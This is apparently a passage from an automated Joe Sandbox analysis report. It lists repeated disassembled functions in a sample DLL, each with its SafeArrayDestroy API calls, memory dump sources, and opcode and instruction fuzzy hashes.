                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 175c973b71dd70846995552a3fc570325724cfe895919fdb0b34ff42df3106fb
                                                          • Instruction ID: 95bafb1750b3baf6cc4919c23cb1650915d6938de2dcd627d7446994391ad4e5
                                                          • Opcode Fuzzy Hash: 175c973b71dd70846995552a3fc570325724cfe895919fdb0b34ff42df3106fb
                                                          • Instruction Fuzzy Hash: 9F414D74A016149FDB10DFA9C980E5EB7F9AF89304F20858AE509EB755DB31E841CF60
                                                          Function 6CF78DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: ceecc19308b6b0c9967eb93d9b3922da8c84103021bc49fd8327e29902cd4d08
                                                          • Instruction ID: 1bacf9939532a16714b19598363aeb18c2f7e42e732c0bbd82452b2b42e8cf18
                                                          • Opcode Fuzzy Hash: ceecc19308b6b0c9967eb93d9b3922da8c84103021bc49fd8327e29902cd4d08
                                                          • Instruction Fuzzy Hash: 10415B70A016189FDB10CFA9DC80F9EB7F9AF89204F21859AE518EB751DB31E940CF60
                                                          Function 6CF70338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: ceecc19308b6b0c9967eb93d9b3922da8c84103021bc49fd8327e29902cd4d08
                                                          • Instruction ID: 0d7f82f6d54a484188aa1e721a52fd81c655b9961e23a04757d38b1d20f696e6
                                                          • Opcode Fuzzy Hash: ceecc19308b6b0c9967eb93d9b3922da8c84103021bc49fd8327e29902cd4d08
                                                          • Instruction Fuzzy Hash: 29413BB0A01608DFCB50CF69DC84B9EB7B9AF89204F24859AE518E7651CB72E941CF60
                                                          Function 6CF78CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: a2e6ddabbed77608d841e26d995fc205e99db2b1e10e40a212ee93cd3cdda806
                                                          • Instruction ID: 168dcac797227acdd1dcbfdda0a90e5d5d4151333c7a1ea44bbac4518ee96ccd
                                                          • Opcode Fuzzy Hash: a2e6ddabbed77608d841e26d995fc205e99db2b1e10e40a212ee93cd3cdda806
                                                          • Instruction Fuzzy Hash: C5313A70E016189FCB10CF69DD80B9EB7F9AF89204F218696E419E7655DB71ED40CF60
                                                          Function 6CF78F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: a1f97d129cd1ffa6034433ecd6c1f5ad7cf6064466d292c16b8f9e5b94a936d2
                                                          • Instruction ID: fb5be50c5de4f62bd82c8a466c7bbc7778124a64400bd54cb0750316f4842fce
                                                          • Opcode Fuzzy Hash: a1f97d129cd1ffa6034433ecd6c1f5ad7cf6064466d292c16b8f9e5b94a936d2
                                                          • Instruction Fuzzy Hash: 81313970E016089FCB10CFA9DC80B9EB7FAAF89204F20858AE418E7651DB75ED41CF60
                                                          Function 6CF78BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: c9c33b9b939590acbbc0fa6b426fa34a1a6f1de0f8f02cf4ee693eb627cdc417
                                                          • Instruction ID: b9c7134351a450c5b58a1ac9e3dc9bfa2e83db74ed8bab7599ec1b21691bb052
                                                          • Opcode Fuzzy Hash: c9c33b9b939590acbbc0fa6b426fa34a1a6f1de0f8f02cf4ee693eb627cdc417
                                                          • Instruction Fuzzy Hash: B6316C70E016089FCB10CF69DC80B9EB7F9AF89204F208596E418E7651C771ED40CF60
                                                          Function 6CF704D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: a1f97d129cd1ffa6034433ecd6c1f5ad7cf6064466d292c16b8f9e5b94a936d2
                                                          • Instruction ID: 0b292bb11de7e947d9096de5b206f8f02cba21195a363be0454f8fb2066f846b
                                                          • Opcode Fuzzy Hash: a1f97d129cd1ffa6034433ecd6c1f5ad7cf6064466d292c16b8f9e5b94a936d2
                                                          • Instruction Fuzzy Hash: BF313C70E01608DFCB50CFA9DC84B9EB7B9AF89304F20859AE518E7651CB76ED418F60
                                                          Function 6CF705DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 8ad445553d647bb258ba5c3d8214b0172bb0c69462836383d8a00d7e5ff8f344
                                                          • Instruction ID: 87742bdc36f5025735c9ba37fc553badebc951c2237785a3b2818d84ac19d079
                                                          • Opcode Fuzzy Hash: 8ad445553d647bb258ba5c3d8214b0172bb0c69462836383d8a00d7e5ff8f344
                                                          • Instruction Fuzzy Hash: 4E312AB0A01618DFCB50CF69DD84B5DB7B9AF89204F20859AE418E7651DB76ED408F60
                                                          Function 6CF70668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 241a94be21c8aeca608ef01d99e0771e6554bf3ee440697f9005de5d5030a448
                                                          • Instruction ID: 2a241168b141b7d9785d4e53bd90203c170627d468b87623a48ed7886d417624
                                                          • Opcode Fuzzy Hash: 241a94be21c8aeca608ef01d99e0771e6554bf3ee440697f9005de5d5030a448
                                                          • Instruction Fuzzy Hash: 17313B70A01618DFCB50DF69DD84B9EB7F9AF89204F20859AE518E7651CB72DD408F60
                                                          Function 6CF7908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 8ad445553d647bb258ba5c3d8214b0172bb0c69462836383d8a00d7e5ff8f344
                                                          • Instruction ID: fed87e135f48b572df8beb1b74999f71767f4f248218cbb39f8f456c990685bf
                                                          • Opcode Fuzzy Hash: 8ad445553d647bb258ba5c3d8214b0172bb0c69462836383d8a00d7e5ff8f344
                                                          • Instruction Fuzzy Hash: 54314970E016189FCB10CB69DC80B9EB7FAAF89204F20858AE418E7641DB71EE40CF60
                                                          Function 6CF791A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: fb49f678ec1bd7d87bb7421a8b8be8b64401797d3c45abd0fa56727aed406cf9
                                                          • Instruction ID: 0fbddaffd8f1db5abc43a888cd427857fecc25205bfd8bc61473737150f73c14
                                                          • Opcode Fuzzy Hash: fb49f678ec1bd7d87bb7421a8b8be8b64401797d3c45abd0fa56727aed406cf9
                                                          • Instruction Fuzzy Hash: B4316A70E016089FCB10CFA9DD80B9EB7F9AF89204F21859AE419E7641DB75EE40CF60
                                                          Function 6CF79118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 241a94be21c8aeca608ef01d99e0771e6554bf3ee440697f9005de5d5030a448
                                                          • Instruction ID: f5bc92cfb10e4e29ac3505cedc32aaa60aeddb75da2649dca9292e7d2a701331
                                                          • Opcode Fuzzy Hash: 241a94be21c8aeca608ef01d99e0771e6554bf3ee440697f9005de5d5030a448
                                                          • Instruction Fuzzy Hash: 7C314A70E016189FCB10CF69DD80B9EB7F9AF89204F21859AE419E7651DB75EE40CF60
                                                          Function 6CF792C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
